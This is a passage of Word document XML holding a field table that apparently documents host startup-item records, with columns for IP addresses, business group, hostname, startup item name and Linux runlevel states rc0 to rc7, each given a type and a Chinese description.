        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10A06D8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7597149B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FFE7778" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="203A057F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DFA8CBD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3602FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="321D883E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32006E51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5594F151" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F3E85DF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF6001C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B6EF6A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AF9659F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CBC4F64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BA305ED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA28DFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432DCB72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EE2B885" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ACD9391" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BC01126" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682756CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4839BA22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69A68503" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3449BC0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12909295" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="625E8AC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FFF32C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C4B3256" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BD702BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6262A25D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F541F04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6936C1D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74B6D900" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25AFBFED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16E49B42" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CFBBD9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60A675EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D06ADA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="344003F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>启动项名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64020FB1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B24F0DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>defaultOpen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33394FD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38B8A0C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DFBE80D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>默认模式启用状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="224BC167" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E20D264" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rc0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C341F0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4697C53C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47765947" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>停机(rc0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C7E9052" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F474045" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rc1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B796537" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B2CDA20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B8F43E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>单用户模式(rc1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22975163" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E734A31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rc2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F237AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="024E9230" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B4AE09B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>多用户无NFS模式(rc2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E3B65E0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2219FA7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rc3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59AB57BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D51CEB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66733EC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>完全多用户模式(rc3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="525D4D6A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C03490" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>rc4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23AD71A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FECBD99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48327272" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>预留模式(rc4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2764070A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="606FB8B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rc5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390E432F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="733441D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36CE6777" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>桌面模式(rc5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CF2ED6F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436ED70F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rc6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E3D3EC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E9E3A73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="773525AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>重新启动(rc6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D2EC2A8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E8B8CC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rc7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AA44C69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C145919" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73AADEB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>单用户自启动(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rcs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74E8CC82" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05EE9F72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
